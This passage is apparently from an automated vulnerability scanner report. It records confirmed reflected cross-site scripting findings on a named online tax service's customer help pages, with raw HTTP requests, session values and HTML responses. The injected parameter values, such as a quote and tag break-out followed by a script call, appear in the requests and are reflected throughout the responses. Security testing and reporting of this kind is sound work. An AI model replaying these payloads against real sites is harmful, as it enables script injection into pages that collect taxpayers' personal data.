((parseInt(rp[2]) < 3) ? 'NOW' : 'TODAY') + "', " + rp[0] + rp[1] + ', ' + tmpstr.substr(0,tmpstr.length-1) + ', ' + tmpstr.substr(tmpstr.length-1,1) + ')"'; } } if (from_str == '') // no from, oper <= pstr += pfx1 + cnt++ + pfx2 + res[1] + dtseq + to_str + ',"oper_id"=>intval("4"));'; else if (to_str == '') // no to, oper >= pstr += pfx1 + cnt++ + pfx2 + res[1] + dtseq + from_str + ',"oper_id"=>intval("6"));'; else // from and to, oper between pstr += pfx1 + cnt++ + pfx2 + res[1] + dtseq + from_str + ". '|' . " + to_str + ',"oper_id"=>intval("9"));'; } } else if (part[i].substr(0,7) == 'int_str') { tmp = part[i].substr(part[i].indexOf('=') + 1).split(','); for (j = 0, tl = tmp.length - 1; j < tl; j++) { res = tmp[j].match(fceqpat); pstr += pfx1 + cnt++ + pfx2 + res[1] + seq + res[2] + '", "oper_id"=>intval("9"));'; } } else if (part[i].substr(0,7) == 'cur_str') { tmp = part[i].substr(part[i].indexOf('=') + 1).split(','); for (j = 0, tl = tmp.length - 1; j < tl; j++) { res = tmp[j].match(fceqpat); cval = res[2].split('|'); if (cval[0] == '') // no from, oper <= pstr += pfx1 + cnt++ + pfx2 + res[1] + seq + cval[1] + '", "oper_id"=>intval("4"));'; else if (cval[1] == '') // no to, oper >= pstr += pfx1 + cnt++ + pfx2 + res[1] + seq + cval[0] + '", "oper_id"=>intval("6"));'; else // from and to, oper between pstr += pfx1 + cnt++ + pfx2 + res[1] + seq + res[2] + '", "oper_id"=>intval("9"));'; } } else if (part[i].substr(0,8) == 'text_str') { tmp = part[i].substr(part[i].indexOf('=') + 1).split(','); for (j = 0, tl = tmp.length - 1; j < tl; j++) { res = tmp[j].match(fceqpat); pstr += pfx1 + cnt++ + pfx2 + res[1] + trimseq + escape(res[2]) + trimopo; } } else if (part[i].substr(0,8) == 'orderby1') { if (part[i].indexOf('dflt') == -1) { res = part[i].match(ordpat); if (res[4] != 0) // 2nd level order pstr += "$p_gridsort=&quot;" + res[2] + ":" + res[3] + ";" + res[4] + ":" + res[5] + "&quot;; $qryargs[&quot;orderby_args&quot;][&quot;order_field1&quot;]=array(&quot;display_col&quot;=>&quot;" + res[2] + "&quot;,&quot;direction&quot;=>&quot;" + res[3] + "&quot;); $qryargs[&quot;orderby_args&quot;][&quot;order_field2&quot;]=array(&quot;display_col&quot;=>&quot;" + res[4] + "&quot;,&quot;direction&quot;=>&quot;" + res[5] + "&quot;);"; else pstr += "$p_gridsort=&quot;" + res[2] + ":" + res[3] + ";&quot;; $qryargs[&quot;orderby_args&quot;][&quot;order_field1&quot;]=array(&quot;display_col&quot;=>&quot;" + res[2] + "&quot;,&quot;direction&quot;=>&quot;" + res[3] + "&quot;);"; } else pstr += "$p_gridsort=&quot;&quot;;" } else if (part[i].substr(0,5) == 'limit') { pstr += '$limit=min(' + part[i].split('=')[1] + ', $vrl_hard);'; } else // multi-select { tmp = part[i].substr(part[i].indexOf('=') + 1).split(','); res = part[i].match(fceqpat); if (res) pstr += pfx1 + cnt++ + pfx2 + res[1] + seq + res[2].replace(/,/g, ';') + '","oper_id"=>intval("' + ((res[2] == '~null~') ? 12 : (res[2] == '~notnull~') ? 13 : 10) + '"));'; } } return(pstr);}// ----------------------------------------------------------------------------function size_dialog(win, divobj){ win.external.SetDlgSize(divobj.offsetWidth + 34, divobj.offsetHeight + 38);}// ----------------------------------------------------------------------------function obj_prop_cnt(obj){ var i, rv = 0; for (i in obj) rv++; return(rv);}// ----------------------------------------------------------------------------function obj_empty(obj){ var i; for (i in obj) return(false); return(true);}// ----------------------------------------------------------------------------function pairs2str(pairs, append_data){ var p =..
- /cgi-bin/olt.cfg/php/enduser/ask.php

/cgi-bin/olt.cfg/php/enduser/ask.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/ask.php?OLTSite=OLTFree%0073541%00%27%22--%3E%3..

Parameters

Parameter Type Value
OLTSite GET OLTFree73541'"--></style></script><script>alert(0x0000F9)</script>
p_sid GET TyYLtJsk
p_accessibility GET 0
p_redirect GET 3

Request

GET /cgi-bin/olt.cfg/php/enduser/ask.php?OLTSite=OLTFree%0073541%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x0000F9)%3C%2Fscript%3E&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=3 HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php?OLTSite=OLTFree%0073541
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: olt.custhelp.com
Cookie: rnw_enduser_login_start=LOGIN_START; rnw_accessibility=1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 20:21:18 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=69260 t=1304108478840542
RNT-Machine: 07
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 11560
X-Cnection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Ask a Question</title><script type="text/javascript" src="/rnt/rnw/javascript/enduser.js" language="JavaScript"></script><script type="text/javascript">var _dflt_sub_product = '-- ';var _dflt_sub_category = '-- ';var _fields = new Array (new field('p_userid', "Username or Email Address", 5, 80, 1),new field('p_subject', "Subject", 5, 240, 1), new field('p_question', "Question", 6, 0, 1),new field('p_icf_8', "Taxpayer name", 5, 40, 0),new field('p_icf_9', "Taxpayer SSN", 5, 4, 0),new field('p_icf_10', "Username", 5, 20, 0),new field('', '', 0, 0, 0));var fld_data = new field_data("is not an integer.","requires a value.","is not completely specified.","The text entered for \'%s\' exceeds its size limit of %d characters by %d characters.","must only contain valid ascii characters.","does not seem to be a valid email address.","Must contain valid furigana characters","Need to select more options.","Need to select fewer options.","Month","Day","Year","Hour","Minute","(([-!#$%&\'*+/=?^~`{|}\\w]+(\\.[-!#$%&\'*+/=?^~`{|}\\w]+)*)|(\"[^\"]+\"))@[0-9A-Za-z]+(-[0-9A-Za-z]+)*(\\.[0-9A-Za-z]+(-[0-9A-Za-z]+)*)+",0,2010,"must not contain either \'<\' or \'>\'","cannot be negative","Field contains too many characters.","Must contain a valid format character.","is not a valid format character.","Must contain a valid number.","is not a valid number.","Must contain a valid alpha-numeric.","is not a valid alpha-numeric.","Must contain a valid letter.","is not a valid letter.","Must contain a valid character.","is not a valid character.","The correct format is","The value you have entered is less than the smallest value allowed for this field.","The value you have entered is greater than the largest value allowed for this field.","is not a valid date.","is not a valid date. Please enter a date in format","MM","DD","YYYY","Minimum year is:","Maximum year is:");// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -var _fasubmit = false;var _submit_accepted = false;function _putCustomFieldMasks(formName){ for(i = 0; i < _fields.length; i++) if(_fields[i].name.match('_icf_')) if(document[formName]['custom_text_' + _fields[i].name]) put_mask(_fields[i].name, document[formName]['custom_text_' + _fields[i].name].value, document[formName], 0); else if(document[formName]['custom_text_lh_' + _fields[i].name]) { put_mask(_fields[i].name, document[formName]['custom_text_lh_' + _fields[i].name].value, document[formName], 0); document.getElementById(_fields[i].name + '_mask').innerHTML=''; }}//-----------------------------------------------------------------------------function _do_submit(form){ var chk_val = true; if (_submit_accepted) // prevents NN4 resubmission return(false); if (_fasubmit) { if (!form.p_new_fattach.value.length) { form.p_new_fattach.focus(); alert("No file attachment name specified."); } chk_val = (form.p_new_fattach.value.length > 0); } if (!_fasubmit) { chk_val = chk_val && _check_fields(form.name, fld_data, _fields); chk_val = chk_val && prodcat_check_fields(form.name, fld_data, form.p_prods.value, form.p_cats.value, 1, 0); } form.submit_btn.disabled = chk_val; _submit_accepted = chk_val; if (form.add_fattach && chk_val) { form.add_fattach.disabled = true; if (form.p_new_fattach.value.length == 0) form.p_single_file.value = 0; if (_fasubmit) form.p_add_fattach.value = 1; else if (form.p_new_fattach.value.length > 0) form.p_single_file.value = 1; } return(chk_val);}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -function _hier_popup(tname){ window.open('hier_disp.php?p_sid=TyYLtJsk&p_accessibility=0&p_redirect=3&p_lva=&p_li=&p_sp=&p_srch_pg=ask.php&p_ask=1&p_tbl='+tname, 'hier_popup', 'scrollbars,resizable,width=550,height=700');}</script></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><form class="block" name="_main" method="post" action="ask_submit.php?p_sid=TyYLtJsk&amp;p_accessibility=0&amp;p_redirect=3&amp;p_lva=&amp;p_sp=&amp;p_li=" enctype="multipart/form-data" onsubmit=" add_prodcat_vals(document._main, prod_array, cat_array); return(_do_submit(this))"><input type="hidden" name="p_add_fattach" value="" /><input type="hidden" name="p_single_file" value="0" /><input type="hidden" name="p_prodnames" value="" /><input type="hidden" name="p_catnames" value="" /><input type="hidden" name="p_sid" value="TyYLtJsk" /><input type="hidden" name="p_lva" value="" /><input type="hidden" name="p_sp" value="" /><input type="hidden" name="p_li" value="" /><input type="hidden" name="p_accessibility" value="0" /><input type="hidden" name="p_redirect" value="3" /><input type="hidden" name="p_token" value="Yp1om2CRaAd0nXCZfJ94l0SdQJ9Mj0iXVJHOj50!" /><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0000F9)%5C/script%5E&p_sid=TyYLtJsk&amp;p_accessibility=1&amp;p_redirect=3">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/seltabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="seltab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="seltab" name="ask_a_question_tab_link" href="ask.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0000F9)%5C/script%5E&p_sid=TyYLtJsk&amp;p_accessibility=1&amp;p_redirect=3">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/seltabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="seltab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="seltab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0000F9)%5C/script%5E&p_sid=TyYLtJsk&amp;p_accessibility=1&amp;p_redirect=3">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0000F9)%5C/script%5E&p_sid=TyYLtJsk&amp;p_accessibility=1&amp;p_redirect=3">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> <td width="1%" valign="bottom"> <table width="1%" cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1%" class="tabbtn" align="left" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> <td width="2%" name="_tab" class="tabbtn" align="center" valign="middle" nowrap rowspan="2"> <a class="tabbtn" href="help_general.php?OLTSite=OLTFree73541'"--></style></script><script>netsparker(0x0000F9)</script>&p_sid=TyYLtJsk&amp;p_accessibility=1&amp;p_redirect=3"> &nbsp;&nbsp;Help&nbsp;&nbsp; </a> </td> <td width="1%" class="tabbtn" align="right" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> </tr> <tr> <td class="tabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> <td class="tabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> </tr> </table> </td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="11"> &nbsp; </td> </tr> <tr><td colspan="10"></td></tr> <tr><td colspan="10"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table> <input type="hidden" name="p_cv" value=""/> <input type="hidden" name="p_pv" value="" /> <input type="hidden" name="p_prods" value="" /> <input type="hidden" name="p_cats" value="" /> <input type="hidden" name="p_hidden_prods" value="" /><script type="text/javascript"> // --------------------------------------------var cprodlvl = 0;var current_prod_lvl = 0;var prod_path = "";var cat_path = "";var prod_hist = new Array();var cat_hist = new Array();var prod_vals ='';var linking_on = false;var prod_array = new Object();prod_array[0] = { item:[ {id:3, label:"OnLine Taxes - Individual", level:0, parent:0}, {id:138, label:"OnLine Taxes - Professional", level:0, parent:0}, {id:143, label:"OnLine Taxes - Professional Desktop", level:0, parent:0}]},p..
- /cgi-bin/olt.cfg/php/enduser/chat.php

/cgi-bin/olt.cfg/php/enduser/chat.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/chat.php?OLTSite=OLTFree%0073541%00%27%22--%3E%..

Parameters

Parameter Type Value
OLTSite GET OLTFree73541'"--></style></script><script>alert(0x000163)</script>
p_sid GET TyYLtJsk
p_accessibility GET 0
p_redirect GET 3

Request

GET /cgi-bin/olt.cfg/php/enduser/chat.php?OLTSite=OLTFree%0073541%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000163)%3C%2Fscript%3E&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=3 HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php?OLTSite=OLTFree%0073541
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: olt.custhelp.com
Cookie: rnw_enduser_login_start=LOGIN_START; rnw_accessibility=1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 20:22:07 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=70119 t=1304108527644459
RNT-Machine: 08
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 12224
X-Cnection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><script type="text/javascript">var $ = getItem; function getItem(id){ return document.getElementById(id);}// This function contained in util.phph; this should be prunedfunction strip_format(vstr, mask_fld){ var i, j, ln = mask_fld.length, dstr; if (!ln || !vstr) return(vstr); for (i = j = 0, dstr = ''; i < ln; i++) { if (mask_fld.charAt(i++) == 'F') j++; else dstr += vstr.charAt(j++); } return(dstr);}function verifyAndLaunch(form){ var cfInput; add_prodcat_vals(form); if(!verifyData(form)) return false;//Copy field values from form input fields into their hidden field counterparts. This is being done primarily so we can strip any masked fields//before sending. $('_icf_8').value = $('_input_icf_8').value; $('_icf_9').value = $('_input_icf_9').value; $('_icf_10').value = $('_input_icf_10').value; launchChat(); form.submit();}function verifyData(form){ if(!_check_fields(form.name, fld_data, chat_fields)) return false; if(!prodcat_check_fields(form.name, fld_data, form.p_prods.value, form.p_cats.value, 1, 0)) return false; return true;}function launchChat(){ var leftPos = (screen.width / 2) - 325; var topPos = (screen.height / 2) - 265; chatWindow = window.open('about:blank', 'chatWindow', 'status=1,toolbar=0,menubar=0,location=0,resizable=1,height=530px,width=640px,left=' + leftPos + ',top=' + topPos);}</script><html lang="en_US"> <head> <meta http-equiv="Pragma" content="no-cache"/> <meta http-equiv="Expires" content="-1"/> <meta name="robots" content="noindex,nofollow"> <link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"> <title>Live Assistance</title> <script type="text/javascript" src="/rnt/rnw/javascript/enduser.js"></script> <script type="text/javascript"> var fld_data = new field_data("is not an integer.","requires a value.","is not completely specified.","The text entered for \'%s\' exceeds its size limit of %d characters by %d characters.","must only contain valid ascii characters.","does not seem to be a valid email address.","Must contain valid furigana characters","Need to select more options.","Need to select fewer options.","Month","Day","Year","Hour","Minute","(([-!#$%&\'*+/=?^~`{|}\\w]+(\\.[-!#$%&\'*+/=?^~`{|}\\w]+)*)|(\"[^\"]+\"))@[0-9A-Za-z]+(-[0-9A-Za-z]+)*(\\.[0-9A-Za-z]+(-[0-9A-Za-z]+)*)+",0,2010,"must not contain either \'<\' or \'>\'","cannot be negative","Field contains too many characters.","Must contain a valid format character.","is not a valid format character.","Must contain a valid number.","is not a valid number.","Must contain a valid alpha-numeric.","is not a valid alpha-numeric.","Must contain a valid letter.","is not a valid letter.","Must contain a valid character.","is not a valid character.","The correct format is","The value you have entered is less than the smallest value allowed for this field.","The value you have entered is greater than the largest value allowed for this field.","is not a valid date.","is not a valid date. Please enter a date in format","MM","DD","YYYY","Minimum year is:","Maximum year is:"); function putCustomFieldMasks(formName) { for(i = 0; i < chat_fields.length; i++) if(chat_fields[i].name.match('_input_icf_')) if(document[formName]['custom_text_' + chat_fields[i].name]) put_mask(chat_fields[i].name, document[formName]['custom_text_' + chat_fields[i].name].value, document[formName], 0); else if(document[formName]['custom_text_lh_' + chat_fields[i].name]) { put_mask(chat_fields[i].name, document[formName]['custom_text_lh_' + chat_fields[i].name].value, document[formName], 0); $(chat_fields[i].name + '_mask').innerHTML=''; } } </script> </head> <body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"> <br /> <!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x000163)%5C/script%5E&p_sid=TyYLtJsk&amp;p_accessibility=1&amp;p_redirect=3">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x000163)%5C/script%5E&p_sid=TyYLtJsk&amp;p_accessibility=1&amp;p_redirect=3">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/seltabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="seltab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="seltab" name="live_help_tab_link" href="chat.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x000163)%5C/script%5E&p_sid=TyYLtJsk&amp;p_accessibility=1&amp;p_redirect=3">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/seltabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="seltab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="seltab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x000163)%5C/script%5E&p_sid=TyYLtJsk&amp;p_accessibility=1&amp;p_redirect=3">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> <td width="1%" valign="bottom"> <table width="1%" cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1%" class="tabbtn" align="left" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> <td width="2%" name="_tab" class="tabbtn" align="center" valign="middle" nowrap rowspan="2"> <a class="tabbtn" href="help_general.php?OLTSite=OLTFree73541'"--></style></script><script>netsparker(0x000163)</script>&p_sid=TyYLtJsk&amp;p_accessibility=1&amp;p_redirect=3"> &nbsp;&nbsp;Help&nbsp;&nbsp; </a> </td> <td width="1%" class="tabbtn" align="right" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> </tr> <tr> <td class="tabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> <td class="tabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> </tr> </table> </td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="11"> &nbsp; </td> </tr> <tr><td colspan="10"></td></tr> <tr><td colspan="10"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table> <table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td> <td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td> <td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td> </tr> <tr> <td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td> <td class="form"> <form 